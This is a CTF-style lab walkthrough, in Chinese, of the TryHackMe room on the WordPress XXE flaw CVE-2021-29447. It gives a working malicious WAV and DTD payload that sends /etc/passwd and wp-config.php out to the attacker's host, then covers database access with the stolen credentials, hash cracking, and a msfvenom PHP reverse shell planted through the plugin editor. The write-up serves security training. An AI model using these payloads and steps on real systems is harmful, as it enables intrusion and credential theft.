# CVE-2021-29447 (WordPress 5.7 XXE漏洞) ###### tags: `CVE` `TryHackMe` `XXE` room: ``` https://tryhackme.com/room/wordpresscve202129447 ``` 參考: ``` https://www.ddosi.org/cve-2021-29447/ ``` 連VPN ``` sudo openvpn cow3345678cow.ovpn ``` ``` ifocnfig ``` 得到VPN ip ``` 10.18.10.74 ``` 按下Start Machine 它會給你目標 網站 IP ``` 10.10.15.78 ``` firefox: ``` http://10.10.15.78/ ``` wpscan ``` sudo wpscan --url http://10.10.15.78 --enumerate ap,at,cb,dbe ``` wordpress版本 ``` WordPress version 5.6.2 identified (Insecure, released on 2021-02-22) ``` wordpress 登入介面: ``` http://10.10.15.78/wp-login.php ``` 輸入帳密密碼(題目給的): ``` user: test-corp password: test ``` 目前是一般使用者。 利用漏洞 製作 payload.wav 改自己的 IP PORT 和 dtd 檔名 ```bash echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.18.10.74:80/poc.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav ``` 製作poc.dtd 改自己的 IP PORT ```dtd <!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd"> <!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.18.10.74:80/?p=%file;'>" > ``` payload 講解: ```dtd <?xml version="1.0"?> <!DOCTYPE ANY[ <!ENTITY % remote SYSTEM 'http://10.18.10.74:80/poc.dtd'>  <! -- 聲明參數實體 remote 只能在 DOCTYPE 宣告中 --> %remote; <! -- 參數實體 remote 請求外部dtd資源 --> %init; <! -- init被引用 相當於聲明了 trick 參數 --> %trick; <! --trick 參數被引用 夾帶密碼資料去外部 dns log --> ]> ``` 外部dtd ```dtd <!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">  <! -- 聲明參數實體 file 獲取密碼檔案 --> <!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.18.10.74:80/?p=%file;'>" >  <! -- 聲明參數實體 init 是一段字串 "<!ENTITY &#x25; trick SYSTEM 'http://10.18.10.74:80/?p=%file;'>"-->  <! -- 同時 %file 被引用相當於 "<!ENTITY &#x25; trick SYSTEM 'http://10.18.10.74:80/?p=密碼表數據'>"--> ``` 在 desktop 開啟web 服務，受害者伺服器可以連到dtd檔 ``` php -S 0.0.0.0:80 ``` 上傳payload.wav，此時伺服器解析 payload.wav 的時候，就會抓取dtd檔，dtd 會去抓取內容 ``` /etc/passwd ``` 抓到內容後，它會利用參數 P 把訊息帶過來。(查看 php 伺服器log) ``` [Fri Oct 21 10:24:43 2022] 10.10.15.78:48502 [404]: GET /?p=hVTbjpswEH3fr+CxlYLMLTc/blX1ZVO1m6qvlQNeYi3Y1IZc+vWd8RBCF1aVDZrxnDk+9gxYY1p+4REMiyaj90FpdhDu+FAIWRsNiBhG77DOWeYAcreYNpUplX7A1QtPYPj4PMhdHYBSGGixQp5mQToHVMZXy2Wace+yGylD96EUtUSmJV9FnBzPMzL/oawFilvxOOFospOwLBf5UTLvTvBVA/A1DDA82DXGVKxqillyVQF8A8ObPoGsCVbLM+rewvDmiJz8SUbX5SgmjnB6Z5RD/iSnseZyxaQUJ3nvVOR8PoeFaAWWJcU5LPhtwJurtchfO1QF5YHZuz6B7LmDVMphw6UbnDu4HqXL4AkWg53QopSWCDxsmq0s9kS6xQl2QWDbaUbeJKHUosWrzmKcX9ALHrsyfJaNsS3uvb+6VtbBB1HUSn+87X5glDlTO3MwBV4r9SW9+0UAaXkB6VLPqXd+qyJsFfQntXccYUUT3oeCHxACSTo/WqPVH9EqoxeLBfdn7EH0BbyIysmBUsv2bOyrZ4RPNUoHxq8U6a+3BmVv+aDnWvUyx2qlM9VJetYEnmxgfaaInXDdUmbYDp0Lh54EhXG0HPgeOxd8w9h/DgsX6bMzeDacs6OpJevXR8hfomk9btkX6E1p7kiohIN7AW0eDz8H+MDubVVgYATvOlUUHrkGZMxJK62Olbbdhaob0evTz89hEiVxmGyzbO0PSdIReP/dOnck9s2g+6bEh2Z+O1f3u/IpWxC05rvr/vtTsJf2Vpx3zv0X - No such file or directory ``` 創建 decoder.php (zlib 庫解碼，把上面的base64 貼上去) 我這邊拿到的data 輸出問題，有時候需要先去掉空白，在去解密 ``` <?php echo zlib_decode(base64_decode('base64here')); ?> ``` 執行 ``` php decoder.php ``` 得到: ```http root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false stux:x:1000:1000:CVE-2021-29447,,,:/home/stux:/bin/bash sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false ``` 到這一步，已經可以看到/etc/passwd 接下來，dtd替換成打印 wp-config.php ```xml <!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-config.php"> ``` 重新上傳payload.wav 得到 ``` [Fri Oct 21 11:00:47 2022] 10.10.15.78:48510 [404]: GET /?p=nVZtT+NGEP5cJP7DcK2UKyVxOaSq4lqVQFKCLkdonAjdp2hjr+0Vzu7evoSLTvffO7N2HIdDreA4CWPPPPP+zPzxly704UF0fHx4AMcwKzgsmeWQKJmJ3BvmhJKQKQP3yqR3hltLgo3wo+5Woj3EgcTwSsEmRmgH3nILrhAWMlFySL0RMscXPOgLaR0ry6DRg0/KQ6pkx0HB1hycIm2ShUe+BCscP4ENyiRMBu1E6U0LG+Xf7DnzBphM6VuJhgLOmpWe217L/60yajmG7gSxTJWleiRH95JgzxvFY/i4if8Zg+XOoZytX8Yc43fwwDfbNwPmWEgn/kIz2vBMfKm/9S/ju/5s1IBelEI+QOGctudR9IjZ1pTtnjJ5ZL3WyriIGSeSkkc8FWS42wTcxYCjHZRmyQPL+X7N8DsWOoLjp+5DNyQfEws5+h9yKmSmIDNqRTk3oQSFso6Uoyj0Syi/ZCsOKgt5S7fB7nVLsJti3JK/hc7gcnHb/zjsnECniTBdvuvAz++Dd41vDRg2gQlWnuLM4+GUcNB0ysyDYzLn0v0HkmbWktHvkO76cXw/mQ4Izc71mYnPqJCnZ8/4RUl41p3RJJ4RQKkSVpJUW7fpg6uCGUs5rrobG7MaGWy2dK9XbO87C1ej/jQeBiPeZb+38akUOxuKZgpxNpr3YBBGKikoPXVpM7KbKr90zxiZjMf9WShQy8CPF7+Exup7zLbEHqymfC7FZ8/hAzZ8GLaYla41X1dbo9yG+UxFlnGD+uArRV0YdNgeBeldC0pugv9Bz9uaMuDr/oQwLXpPpiTMXxfnLzrtnUYWvYl2jUgisBPBR7MWCf+2Zzxpu8wcRrUBrQS6TBwiViEOIZFJREo+In0B/yKsq+hCPQiqXCCWR2IeHIWkkqI+tqS9ZbdS5QTKciSeXc4uMFzUeNf7rfdrPbRNefrz2WjxYfgJi7P919HeVRO6l1IoMM9V/RrteHg1nw4XbZAXaI8n19fDweLmdufAC7RvJ7dXw33XX6AdXI7749mrtNtx1yCvirtx4MVx77n+/9r1xHVrwq43845Qm0GftZbKroO2rRz6bOVLJ3TJ93YtsTso2WJspARarblAFc6SIgCxxsPKAkxkuQHpV0vs5BMocXuEB5p8L1N8ThQ6CGgOMY/q7v0p0NmiwoA/kfe1M5tF5307uL9xY6R8zUulEea8FWzKlz7PabpWKuXPcIsIQ+WMD0PFZchJWEfC6pJtaDtJhZSFntX3R21phUwUAOEGx9uCdUbJHEM0PFEr/JryFJGQBXTpcxpVSX9zJIGdr4HG7+8Wg+Hl/Lq+akhImLYZ9GstEJ2eWwRJYdOiNauKT+k/6ho6PLBcKFvZp3IuwypMw3JtknISYNYCr6MqZpV4slGdVK86LRrsrpDdRjR6ykXbkLGvM1ZiDradi+THXMcS551gSpWG+lg5ghHTeLJpvyyFLfDN3vYhxNEknAYBsDVH9Cm+mQ3n03H7a7X6+kurSu9ovbsitELB2/0jsJpOmU1lDBv9LRxBBZwSt1RXGE4e/nw9PPhhxzr1lxNYLAY308UCetCJqhH9trUec6yR1y2Da1zwoVOQx0tPLUQXZr3ODf/s0aGFIo6vDRAs3nHbY4xOVxqOfwE= - No such file or directory ``` 解碼: ```php <?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'wordpressdb2' ); /** MySQL database username */ define( 'DB_USER', 'thedarktangent' ); /** MySQL database password */ define( 'DB_PASSWORD', 'sUp3rS3cret132' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'put your unique phrase here' ); define( 'SECURE_AUTH_KEY', 'put your unique phrase here' ); define( 'LOGGED_IN_KEY', 'put your unique phrase here' ); define( 'NONCE_KEY', 'put your unique phrase here' ); define( 'AUTH_SALT', 'put your unique phrase here' ); define( 'SECURE_AUTH_SALT', 'put your unique phrase here' ); define( 'LOGGED_IN_SALT', 'put your unique phrase here' ); define( 'NONCE_SALT', 'put your unique phrase here' ); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wptry_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* That's all, stop editing! Happy publishing. */ define('WP_HOME', false); define('WP_SITEURL', false); /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; ``` 得到 db 的username nmap 掃一下 ``` sudo nmap -p 3306 10.10.107.98 ``` mysql 連接 ``` mysql -h 10.10.107.98 -u thedarktangent -p ``` pw: ``` sUp3rS3cret132 ``` show databases; ``` show databases; ``` 使用庫 ``` use wordpressdb2; ``` show 表 ``` show tables; ``` user 表: ``` select * FROM wptry_users; ``` 兩個user ``` corp-001 | $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1 test-corp | $P$Bk3Zzr8rb.5dimh99TRE1krX8X85eR0 ``` hash-identifier ``` hash: $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1 ``` 創建hash_wps.txt ``` $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1 ``` 解壓 rockyou.txt ``` sudo gzip -d /usr/share/wordlists/rockyou.txt.gz ``` john ``` john hash_wps.txt --wordlist=/usr/share/wordlists/rockyou.txt ``` ``` john --show hash_wps.txt ``` password: ``` teddybear ``` 登入管理者: ``` user: corp-001 passwd: teddybear ``` msfvenom 生成php 反彈木馬 ``` msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.1.195 LPORT=4444 > reverse.php ``` msfconsole 監聽 ``` use exploit/multi/handler set LHOST 10.10.1.195 set LPORT 4444 set PAYLOAD php/meterpreter/reverse_tcp exploit ``` 找到plugins的地方，然後找hello dolly 的頁面用reverse.php 木馬覆蓋hello.php。保存 (記得先關閉插件在修改) 插件修改頁面 ``` http://10.10.1.195/wp-admin/plugin-editor.php?plugin=hello.php&Submit=Select ``` 網址觸發拿到shell: ``` http://10.10.243.74/wp-content/plugins/hello.php ``` 交互shell: (找flag) ``` ls cd home cd stux cd flag cat flag.txt ```